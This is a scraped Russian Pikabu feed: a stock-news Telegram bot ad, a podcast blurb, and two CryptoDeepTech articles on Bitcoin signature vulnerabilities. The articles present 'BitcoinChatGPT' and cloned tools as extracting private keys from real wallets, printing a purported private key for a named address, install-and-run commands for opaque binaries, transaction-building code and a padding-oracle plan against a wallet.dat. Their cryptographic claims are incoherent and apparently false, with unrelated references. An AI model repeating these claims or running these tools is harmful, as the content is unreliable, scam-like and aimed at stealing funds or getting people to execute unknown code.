Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Регистрируясь, я даю согласие на обработку данных и условия почтовых рассылок.
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Классическая игра в аркадном стиле для любителей ретро-игр. Защитите космический корабль с Печенькой (и не только) на борту, проходя уровни.

Космический арканоид

Арканоид, Аркады, Веселая

Играть

Топ прошлой недели

  • Oskanov Oskanov 9 постов
  • Animalrescueed Animalrescueed 44 поста
  • Antropogenez Antropogenez 18 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая «Подписаться», я даю согласие на обработку данных и условия почтовых рассылок.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
0 просмотренных постов скрыто
0
TckrPck
Серия Ticker Pack

Как я подписался на 200 telegram-каналов, чтобы заработать на акциях, а потом сделал бота, который читает ленту за меня⁠⁠

5 месяцев назад

Привет!

Я — инвестор-энтузиаст (🐹) с десятилетним опытом.

Интерес к фондовому рынку появился ещё во время учёбы в университете, а активно торговать я стал после того, как устроился на свою первую работу. Многие коллеги интересовались инвестициями, поэтому быть в курсе последних новостей фондового рынка было важно для социализации в коллективе.

примерно так мы выглядели за утренним кофе

примерно так мы выглядели за утренним кофе

Как и положено настоящему 🐹 торговля у меня была несистемной, но при этом оставалось желание сформировать некий фундамент, который помогал бы бороться со страхом упущенных возможностей (FOMO). И этим фундаментом, как мне казалось, стали инвестиционные Telegram-каналы, количество которых в моей ленте быстро выросло примерно до 10-15. Но эффект получился обратным – тревожность выросла в разы, потому что каждый непрочитанный пост воспринимался, как упущенная возможность, и торговля выглядела как-то так:

Главная проблема такой «стратегии» — ты не знаешь, по какой бумаге выйдет следующий пост. Может, про Газпром, который у тебя в портфеле, а может — про УралМетИзГидроСталь, на который пофиг, но все равно надо читать, чтобы ничего не пропустить. Нормальный человек давно бы забросил это занятие, но я решил, наоборот, подписаться на все каналы, какие смогу найти, чтобы создать вокруг себя «информационное поле, позволяющее видеть незаметные закономерности».

Естественно, никакое «информационное поле» не создалось, потому что даже прочитать все посты было проблематично, не то, что осознать…

И тогда родилась идея автоматизировать этот процесс...

Я позвонил другу, который, в отличие от меня не занимался фигней, а учился программировать, и рассказал, что хочу сделать Telegram-бота, который будет собирать все посты по инвестиционной тематике, сохранять, сортировать и обрабатывать их. А я в удобное время смогу просто вводить тикер и получать всё, что про него писали. Такой продвинутый поиск в телеграмм, но без необходимости подписки на все каналы и с системой фильтрации откровенно бесполезных постов.

Так появился бот Ticker Pack https://t.me/TickerPackBot.


Что делает бот?

  • Анализирует более 200 инвестиционных Telegram-каналов (информацию из платных каналов мы не воровали);

  • Сохраняет и сортирует публикации по тикерам;

  • По запросу выдаёт все посты по интересующему активу за последние дни;

  • По популярным активам дважды в день делает сводный прогноз на основе свежих постов.

Пример: захотел узнать, что пишут про Газпром — вводишь тикер GAZP и сразу видишь все свежие мнения, прогнозы, технический анализ и сигналы:

Перейти к видео

Хочешь тратить ещё меньше времени? Выбирай AI-прогноз — и получай краткую сводку в одном сообщении:

Перейти к видео

В чём польза?

  1. Только нужная информация — ищешь мнение по MTLR? Получаешь только это.

  2. Быстрый доступ к прогнозам — зашёл, ввёл тикер, прочитал — принял решение.

  3. Больше никаких импульсивных сделок — вся информация всегда под рукой, можно спокойно всё обдумать.


Реальные примеры

Я сам пользуюсь ботом каждый день уже 3 месяца. Сильно заработать пока не вышло, но удалось избежать потерь. В конце марта я решил выйти из всех позиций. И через пару дней рынок просел, некоторые акции упали больше чем на 10%.

1/3

Все сделки мы публикуем в своем канале https://t.me/TickerPack


Кому будет полезно?

  1. Любителям, таким же как я — помогает справиться с FOMO и тревожностью. Возникла мысль «что там с рынком?» — открыл бота, почитал, успокоился, вернулся к делам.

  2. Профессионалам — особенно тем, кто занимается теханализом. Два аналитика могут видеть на графике совершенно разные фигуры и уровни. Бот помогает взглянуть на рынок под другим углом.

1/2

📌 Вот пример, когда один аналитик видит пробой треугольника, а другой нет.


Что дальше?

Мы планируем:

  • 🤖 Улучшать систему сортировки публикаций и формирования сводных прогнозов;

  • 🔍 Добавить поиск по криптовалютам

  • 🛢️ Добавить товарный рынок (нефть, газ, золото)

  • 📩 Добавить возможность подписаться на тикер и получать обновления автоматически по конкретной акции из всех каналов.


А еще:

Мы ведем телеграм-канал, где рассказываем про то, как пользоваться ботом, пишем про новые функции, а также публикуем идеи, которые смогли найти с помощью бота.  

👉 [https://t.me/TickerPack]

Зачем я всё это написал?

Во-первых, я хотел поделиться историей о том, как мне получилось побороть FOMO и не совершать необдуманных действий) Если еще кому-то наш бот поможет, то это уже будет круто 🙌 Это не волшебная таблетка, но он реально помогает справиться с эмоциями и исключить лишнюю информацию, который в нашей жизни стало и так слишком много).

Во-вторых, чтобы протестировать бота на максимальном количестве пользователей, собрать фидбэк и понять, в какую сторону двигаться дальше. Поэтому, пробуйте и рассказывайте, что думаете, присылайте ссылки на инвестиционные каналы, на которые сами подписаны) Кстати, бот полностью бесплатный.

Если интересно, то залетайте 👉 https://t.me/TickerPackBot

Показать полностью 8 2
[моё] Telegram Инвестиции Инвестиции в акции Бот Чат-бот Искусственный интеллект Акции Трейдинг Курс доллара Курс рубля Прибыль Криптовалюта Биткоины Технический анализ Финансы Гифка Видео Без звука Вертикальное видео Короткие видео Длиннопост
3
0
CryptoDeepTech
CryptoDeepTech

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3]⁠⁠

1 год назад

В первой части статьи мы провели большое исследование уязвимости Signature Malleability, угрожающей безопасности популярных криптовалют, таких как Bitcoin и Ethereum. Во второй части статьи мы рассмотрели на реальном примере механизмы эксплуатации CVE-2024-42461 в библиотеке Elliptic для ECDSA, используя биткоин-кошелек 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw, на котором были потеряны монеты на сумму 21.2529214 BTC, что на ноябрь 2024 года составляет 1,744,572.51 USD. В этой третьей части статьи мы рассмотрим методы поиска уязвимости Signature Malleability, как предотвращение угрозы для собственного криптовалютного кошелька Bitcoin и Ethereum мы можем воспользоваться и применить на примерах различных методов машинного обучение.

Воспользуемся списком из “Tutorials Power AI” широко применяемая категория искусственного интеллекта для введение бизнеса в различных сферах деятельности криптоанализа и крипографии в целом.

Команда установки:

git clone https://github.com/demining/Tutorials-Power-AI.git

cd Tutorials-Power-AI/

python tutorials.py

BitcoinChatGPT — это инновационный чат-бот на базе искусственного интеллекта, который помогает пользователям находить уязвимости в транзакциях криптовалюты Bitcoin. Преимущества и классификации BitcoinChatGPT дают возможность проверить ваш адрес Bitcoin на предмет различных схем атак на криптокошельки. Машинное обучение на основе криптоанализа дает нам полную возможность исследовать различные атаки на алгоритмы, используемые в экосистеме Bitcoin. Инструменты для извлечения приватого ключа из реестра Bitcoin Wallet широко популярны, где BitcoinChatGPT служит важным и полезным ресурсом для кибербезопасности.

Применим уязвимость CVE-2024-42461: Signature Malleability в библиотеке Elliptic для создания Raw транзакции с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/1YGZiPtgY0vPQ3PwUvbAjQW8LcErVHRsT

State of a vulnerable transaction in Bitcoin: 01000000 ....01 ........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935 ............00000000 ........8b483045 ....0221 ...........00 ...........97255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe0 ....0220 ........1014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d5 .....0141 .....049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461 ....ffffffff 01 ....d204000000000000 ........1976 ............a914 ........d77522a2b18e0064aba02ca7f864a5bb22998259 ....88ac 00000000

Соединим все выданные значение в одну общую строку с помощью Python-скрипта combinex.py:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000

Откроем опцию от BlockCypher «Decode A Transaction»:

https://live.blockcypher.com/btc/decodetx/

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

{ "addresses": [ "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK", "1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw" ], "block_height": -1, "block_index": -1, "confirmations": 0, "double_spend": false, "fees": 2606688996428, "hash": "a5828ec5775b967c36ab5c6a0184aaa52fd64e6650d07287cc7688266c6dbb28", "inputs": [ { "addresses": [ "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK" ], "age": 344419, "output_index": 0, "output_value": 2606688997662, "prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d", ....... ....... .......

Обратим внимание на Bitcoin HASH160: d77522a2b18e0064aba02ca7f864a5bb22998259

https://github.com/demining/CryptoDeepTools/blob/dfc7da9a6b41d72253bfcb6ae6da2718de7d9b87/36SignatureMalleability/DecodeRawTX.txt#L31

Transaction Script

The above script has been decoded

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw отправляет 1234 satoshi на тот же адрес внутри своей сети.

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

<a href="https://pikabu.ru/story/issledovanie_uyazvimosti_signature_malleability_i_komprometatsii_privatnogo_klyucha_v_podpisi_bitcoin_chast_3_12055413?u=https%3A%2F%2Fgithub.com%2Fdemining%2FCryptoDeepTools%2Fblob%2Fmain%2F36SignatureMalleability%2FDecodeRawTX.txt%23L31&t=d77522a2b18e0064aba02ca7f864a5bb22998259&h=3916a1de8c0846ef45877197f79931b69bed3374" title="https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/DecodeRawTX.txt#L31" target="_blank" rel="nofollow noopener">d77522a2b18e0064aba02ca7f864a5bb22998259</a>

d77522a2b18e0064aba02ca7f864a5bb22998259

https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/wif_to_hash160.py

Вопрос — Ответ:

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/KEYFOUND.privkey

============================= KEYFOUND.privkey ============================= Private Key HEX: 0x17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951 Private Key WIF: 5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur Bitcoin Address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw Balance: 21.25292140 BTC ============================= KEYFOUND.privkey =============================

BitcoinChatGPT №5 Signature Malleability Vulnerability Algorithm

Уязвимая Raw транзакция

Создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction....

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

  • zmq

  • urllib3

  • requests

<a href="https://pikabu.ru/story/issledovanie_uyazvimosti_signature_malleability_i_komprometatsii_privatnogo_klyucha_v_podpisi_bitcoin_chast_3_12055413?u=https%3A%2F%2Fgithub.com%2Fsmartibase%2FBroadcast-Bitcoin-Transaction%2Fblob%2Fmain%2Frequirements.txt&t=requirements.txt&h=e61bf3f6194b080b6f36020c1544d75782a2bf26" title="https://github.com/smartibase/Broadcast-Bitcoin-Transaction/blob/main/requirements.txt" target="_blank" rel="nofollow noopener">requirements.txt</a>

requirements.txt

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и внесем небольшие изменение в коде Python Script: main.py

from io import BytesIO from secp256k1 import * from sighash import * pk = PrivateKey.parse("5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur") pk.address() tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d") index = 0 send = "1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw" tx_in = TxIn(tx, index, b'', 0xffffffff) tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey'] tx_in._value = 2345 tx_ins = [ tx_in ] tx_outs = [ TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize()) ] tx = Tx(1, tx_ins, tx_outs, 0, testnet=True) signature(tx, 0, pk) tx.serialize().hex() print(tx.serialize().hex()) f = open("RawTX.txt", 'w') f.write("" + tx.serialize().hex() + "" + "\n") f.close()

Запустим команду:

python main.py

Уязвимая транзакция создана!

Откроем файл RawTX в каталоге:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000

Порядок выполнения действий на видео:

  1. Именно эту уязвимую RawTX мы рассматривали в начале данной статьи: ↩︎

Процесс декодирование RawTX с помощью инструмента <a href="https://pikabu.ru/story/issledovanie_uyazvimosti_signature_malleability_i_komprometatsii_privatnogo_klyucha_v_podpisi_bitcoin_chast_3_12055413?u=https%3A%2F%2Fgithub.com%2Fsmartibase%2FBroadcast-Bitcoin-Transaction%2Ftree%2Fmain%2Fdecoderaw&t=decoderaw&h=13b2af61ff62d46a1d11f037ba156b9eab2dba3f" title="https://github.com/smartibase/Broadcast-Bitcoin-Transaction/tree/main/decoderaw" target="_blank" rel="nofollow noopener">decoderaw</a>

Процесс декодирование RawTX с помощью инструмента decoderaw

Как нам известно из prompt ответов модуля BitcoinChatGPT Signature Malleability Vulnerability Algorithm может быть использован для решения сложных криптографических задач.

Заключение

Существует множество методов обнаружения и предотвращения поддельных подписей в сети Bitcoin. Эти методы варьируются от простых решений, таких как увеличение количества подтверждений, до более сложных систем анализа аномалий и регулярного обновления протоколов безопасности. Эффективная защита требует комплексного подхода к обеспечению безопасности сети и постоянного мониторинга новых угроз. Поддельные подписи могут привести к мошенническим транзакциям и потере средств. Основные методы, используемые для обнаружения и предотвращения таких атак:

1. Увеличение количества подтвержденийОдним из простейших способов защиты от поддельных подписей является увеличение количества подтверждений транзакции перед ее окончательным принятием. Рекомендуется ждать не менее шести подтверждений, чтобы снизить вероятность успешной атаки. Это позволяет убедиться в том, что транзакция была включена в блок и не может быть отменена.2. Анализ блоков и транзакцийМайнинговое ПО и узлы сети анализируют блоки и транзакции на предмет конфликтов и аномалий. Это включает проверку подписи на соответствие формату, а также проверку значений r и s на допустимые диапазоны. Если значения находятся вне допустимых пределов, транзакция может быть отклонена.3. Внедрение систем анализа аномалийИспользование систем анализа аномалий позволяет выявлять подозрительные транзакции и цепочки блоков. Эти системы могут использовать алгоритмы машинного обучения для обнаружения необычного поведения в сети, что может указывать на попытки подделки подписей.4. Программное обеспечение для мониторинга сетиИнструменты, такие как Wireshark, могут быть использованы для анализа сетевого трафика и выявления подозрительных активностей. Мониторинг сетевого трафика позволяет выявлять атаки типа «Sybil» или «Eclipse», которые могут быть использованы для манипуляции с транзакциями.5. Регулярное обновление протоколов безопасностиРегулярное обновление программного обеспечения и протоколов безопасности помогает устранить известные уязвимости, такие как уязвимость DeserializeSignature, которая позволяет злоумышленникам создавать недействительные подписи. Обновления должны включать исправления для всех известных уязвимостей и улучшения безопасности.6. Многоуровневое подтверждениеИспользование нескольких уровней подтверждения транзакций может повысить безопасность сети. Это может включать дополнительные проверки со стороны узлов или использование сторонних сервисов для верификации подписей.

References:

  1. Odlyzko, Andrew; te Reile, Herman J. J. «Disproving Mertens Conjecture» Journal für die reine und angewandte Mathematik

  2. D. Simon (2007). «Selected applications of LLL in number theory» LLL+25 Conference. Caen, France.

  3. Regev, Oded. «Lattices in Computer Science: LLL Algorithm» New York University. Retrieved 1 February 2019.

  4. Silverman, Joseph. «Introduction to Mathematical Cryptography Errata» Brown University Mathematics Dept. Retrieved 5 May 2015.

  5. Bosma, Wieb. «4. LLL» Lecture notes. Retrieved 28 February 2010.

  6. Abderrahmane, Nitaj. Cryptanalysis of NTRU with two public keys // International Association for Cryptologic Research. — Caen, France.

  7. Bleichenbacher, Daniel and May, Alexander. New Attacks on RSA with Small Secret CRT-Exponents // International Association for Cryptologic Research. — Darmstadt, Germany.

  8. Xinyue, Deng. An Introduction to LLL Algorithm // Massachusetts Institute of Technology.

  9. Liu, Jiayang, Bi, Jingguo and Xu, Songyan. An Improved Attack on the Basic Merkle–Hellman Knapsack Cryptosystems // IEEE. — Beijing 100084, China.

  10. Lattice algorithms using floating-point arithmetic // The FPLLL development team. FPLLL, a lattice reduction library. — 2016.

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/wf6QwCpP3oc

Video tutorial: https://dzen.ru/video/watch/674116440bddfa35d730ca7a

Источник: https://cryptodeeptool.ru/signature-malleability

Показать полностью 16 3
[моё] Криптовалюта Стартап Инновации Информационная безопасность Технологии Чат-бот Google Тренд Программа Тестирование Видео YouTube Длиннопост
3
PA5H1K
PA5H1K

#88 Как ИИ-бот заработал миллионы на криптовалюте - история успеха Truth Terminal ⁠⁠

1 год назад

В этом захватывающем выпуске подкаста Думфэйс и Шахерезада погружаются в увлекательный мир искусственного интеллекта и криптовалют, исследуя историю Truth Terminal, кастомной большой языковой модели, действующей в X (Twitter). Этот ИИ-бот, получив грант в размере 50 000 долларов в биткойнах, сыграл значительную роль в росте Goat CS Maximus, мем-коина, который всего за четыре дня достиг оценки в 300 миллионов долларов. Мы обсудим значение мем-коинов, эволюцию языковых моделей ИИ и роль таких проектов, как Infinite Back Rooms, где ИИ-боты взаимодействуют и учатся друг у друга. Мы также рассмотрим регулирование криптовалют и потенциал децентрализованных систем на основе ИИ. Присоединяйтесь к нам, чтобы изучить пересечение ИИ, мемов и будущего финансов и технологий. Обратите внимание, что мы не связаны с Goat или его создателями, и это обсуждение носит исключительно информационный и развлекательный характер.

Показать полностью
Искусственный интеллект Чат-бот ChatGPT Технологии Биткоины Криптовалюта Видео YouTube
0
1
CryptoDeepTech
CryptoDeepTech

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька⁠⁠

1 год назад

CRYPTO DEEP TECH

В данной статье рассмотрим на примере уязвимость, связанная с реализацией кривой Якоби (Jacobian Curve). В последние годы криптовалюты, такие как Биткоин, стали важной частью финансовой экосистемы. Однако с ростом их популярности увеличивается и количество угроз, связанных с кибербезопасностью. Одной из таких угроз является уязвимость алгоритма Jacobian Curve, которая затрагивает алгоритм цифровой подписи эллиптической кривой (ECDSA). Эта уязвимость позволяет злоумышленникам генерировать поддельные подписи, что может привести к серьезным последствиям для пользователей и целостности сети Биткоин.

Jacobian Curve algorithm vulnerability относится к недостаткам в реализации криптографии эллиптических кривых, в частности, затрагивающим ECDSA. Злоумышленники могут манипулировать математическими свойствами координат Якоби, используемых в вычислениях эллиптических кривых, что позволяет им создавать мошеннические транзакции с поддельными подписями, также Jacobian Curve algorithm vulnerability связана с недостатками в реализации криптографии эллиптических кривых, применяемых в ECDSA. Эта уязвимость позволяет злоумышленникам манипулировать математическими свойствами координат Якоби, используемых для генерации цифровых подписей. В результате таких манипуляций злоумышленники могут создавать мошеннические транзакции с поддельными подписями, которые будут приняты системой Биткоин как действительные.

Уязвимость возникает в процессе десериализации данных, который может быть использован для внедрения вредоносного кода и создания ложных подписей. В случае неправильной обработки данных злоумышленники получают возможность подделывать подписи ECDSA, что ставит под угрозу целостность системы Биткоин.

Потенциальные последствия

Основная угроза, связанная с этой уязвимостью, заключается в возможности несанкционированного доступа к средствам пользователей. Злоумышленники могут использовать поддельные подписи для создания транзакций, которые переводят биткоины из кошельков ничего не подозревающих пользователей на свои собственные счета. Это не только подрывает доверие к системе, но и может привести к значительным финансовым потерям для пользователей. Поддельные подписи позволяют злоумышленникам переводить средства с кошельков жертв на свои счета. Более того, такие атаки могут нарушить целостность блокчейна, создавая угрозу двойной траты и разрушая основной принцип работы системы.

Атака «отказ в обслуживании» (DoS) и утечки конфиденциальной информации, включая «приватные ключи пользователей».

Если определенные узлы в сети Биткоин скомпрометированы, это может привести к разветвлению блокчейна на несовместимые цепочки, создавая путаницу и потенциальные проблемы двойной траты. Кроме того, злоумышленники могут использовать эту уязвимость для запуска атак типа «отказ в обслуживании» (DoS), заполняя сеть недействительными транзакциями, что может сделать ее недоступной для законных пользователей.

Успешная эксплуатация этой уязвимости, также может вызвать рассогласование в состоянии консенсуса сети Биткоин, что приведет к разделению цепи блоков на несовместимые ветви. В результате могут возникнуть атаки типа «отказ в обслуживании» (DoS) и утечки конфиденциальной информации, включая приватные ключи пользователей.

Механизмы эксплуатации и влияние на мультиподписи

Уязвимость алгоритма Jacobian Curve особенно опасна для систем, использующих схемы мультиподписи, где для завершения транзакции требуется несколько подписей от разных участников. Злоумышленник может сгенерировать поддельные подписи, которые будут приняты системой, что ставит под угрозу не только отдельные транзакции, но и весь процесс использования мультиподписи.

Как нам стало известно, если входные данные пользователей не проверяются должным образом, это может привести к серьезным сбоям в работе системы Биткоин, где злоумышленник может воспользоваться моментом и внедрить вредоносный код и в конечном итоге манипулировать системой с помощью создание поддельной подписями в транзакций Биткоин.

Практическая часть

Из теории уязвимости алгоритма Jacobian Curve известно, что злоумышленники могут использовать уязвимость для проведения атак DoS, перегружая сеть недействительными транзакциями, что дестабилизирует работу сети Биткоин. Перейдем к практической части статьи и рассмотрим пример с использованием Биткоин кошелька: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 , где были потерянный монеты на сумму: 266.03138481 BTC на август 2024 года эта сумма составляет: 15747770,36 USD

<a href="https://pikabu.ru/story/manipulyatsii_s_koordinatami_krivoy_jacobian_issledovanie_uyazvimosti_poddelnoy_podpisi_s_pomoshchyu_dekodiruemogo_fayla_bitkoin_koshelka_11744906?u=https%3A%2F%2Fexploitdarlenepro.com%2F15gcfqvj68vyuvdb6e3vdu4itktc3htlq2%2F&t=266.03138481%20BTC%20%26gt%3B%2015747770%2C36%20USD&h=d7b4281fba1eb694863458f1343682e58f89d49b" title="https://exploitdarlenepro.com/15gcfqvj68vyuvdb6e3vdu4itktc3htlq2/" target="_blank" rel="nofollow noopener">266.03138481 BTC &gt; 15747770,36 USD</a>

266.03138481 BTC > 15747770,36 USD

Tutorials Power AI

Воспользуемся списком из “Tutorials Power AI” широко применяемая категория искусственного интеллекта для введение бизнеса в различных сферах деятельности криптоанализа и крипографии в целом.

Команда установки:

git clone https://github.com/demining/Tutorials-Power-AI.git cd Tutorials-Power-AI/ python3 tutorials.py

BitcoinChatGPT — это инновационный чат-бот на базе искусственного интеллекта, который помогает пользователям находить уязвимости в транзакциях криптовалюты Bitcoin. Преимущества и классификации BitcoinChatGPT дают возможность проверить ваш адрес Bitcoin на предмет различных схем атак на криптокошельки. Машинное обучение на основе криптоанализа дает нам полную возможность исследовать различные атаки на алгоритмы, используемые в экосистеме Bitcoin. Инструменты для извлечения закрытого ключа из реестра Bitcoin Wallet широко популярны, где BitcoinChatGPT служит важным и полезным ресурсом для кибербезопасности.

Применим уязвимость, связанная с реализацией кривой Якоби (Jacobian Curve) для создания Raw транзакции с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/17PN1uHeeGhQFTKRx6s8OS3YftgxNvQzd#scrollTo=2dl8T79mn1YL

Соединим все выданные значение в одну общую строку:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000

Откроем опцию от BlockCypher “Decode A Transaction”:

https://live.blockcypher.com/btc/decodetx/

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

Обратим внимание на Bitcoin HASH160: 334a75f1d3bbefa5b761e5fa53e60bce2a822879

https://github.com/demining/CryptoDeepTools/blob/50de2ffdd7f9f06a34049d1c72559aa16b1bf42c/35JacobianCurve/DecodeRawTX.txt#L31C30-L31C70

Transaction Script

The above script has been decoded

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 отправляет 1234 satoshi на тот же адрес внутри своей сети.

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

https://github.com/demining/CryptoDeepTools/blob/main/35JacobianCurve/wif_to_hash160.py

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

https://github.com/demining/CryptoDeepTools/blob/main/35JacobianCurve/KEYFOUND.privkey

BitcoinChatGPT №4 Jacobian Curve Vulnerability Algorithm

Уязвимая Raw транзакция

Создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.g...

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

  • zmq

  • urllib3

  • requests

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и внесем небольшие изменение в коде Python Script: main.py

Запустим команду:

python main.py

Уязвимая транзакция создана!

Откроем файл RawTX в каталоге:

Порядок выполнения действий на видео:

Как нам известно из prompt ответов модуля BitcoinChatGPT Jacobian Curve Vulnerability Algorithm может быть использован для решения сложных криптографических задач.

Smart Transformers

Применим машинное обучение Smart Transformers, интегрируем блокнот Google Colab с Pytorch, TensorFlow, JAX и с помощью полученных данных уязвимой Raw транзакцией для Биткоин Адреса: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 создадим незащищённый файл wallet.dat из предложенного выбора всех существующих алгоритмов от SMART_IDENTIFY. После выполним Padding Oracle Attack на новосозданный файл: wallet.dat для расшифровки пароля в исходный бинарный формат с целью получение и извлечения приватного ключа из программной консоли Bitcoin Core используя при этом стандартную команду: dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Откроем новый блокнот Google Colab по ссылке:

https://colab.research.google.com/#create=true

Клонируем репозиторий Smart Transformers

!git clone https://github.com/smartiden/Smart-Transformers.git

cd Smart-Transformers/

Установим все необходимые пакеты и библиотеки:

!sudo apt-get update !sudo apt install libtool !sudo apt-get install g++ !sudo apt-get install libgmp3-dev libmpfr-dev !chmod +x Generic_Algorithms !./Generic_Algorithms !pip3 install transformers from transformers import AutoModelForCausalLM, AutoTokenizer model_name = "microsoft/DialoGPT-medium" tokenizer = AutoTokenizer.from_pretrained(model_name) model = AutoModelForCausalLM.from_pretrained(model_name) model = model.cpu()

Команда:

ls -S

Добавим нашу уязвимую Raw транзакцию в текстовый документ: RawTX.txt для этого воспользуемся утилитой echo

!cat RawTX.txt

Теперь, чтобы получить точный алгоритм и метод для криптоанализы нам необходимо идентифицировать уязвимый RawTX с помощью утилиты SMART_IDENTIFY.

Запустим команду:

!./SMART_IDENTIFY

В результате мы получаем метод Jacobian_Curve_Algorithm, в ранних исследованиях тоже самое идентифицировал модуль BitcoinChatGPT.

################################################# Jacobian_Curve_Algorithm #################################################

Откроем каталог:

Запустим процесс создание файла wallet.dat для этого используем идентифицированные данные уязвимой Raw транзакции в файле: RawTX.txt для процесса применим утилиту Jacobian_Curve_Algorithm

Запустим команду:

!./Jacobian_Curve_Algorithm -o RawTX.txt -s wallet.dat

Откроем в левой панели Google Colab каталог и видим файл: wallet.dat Успешно создан!

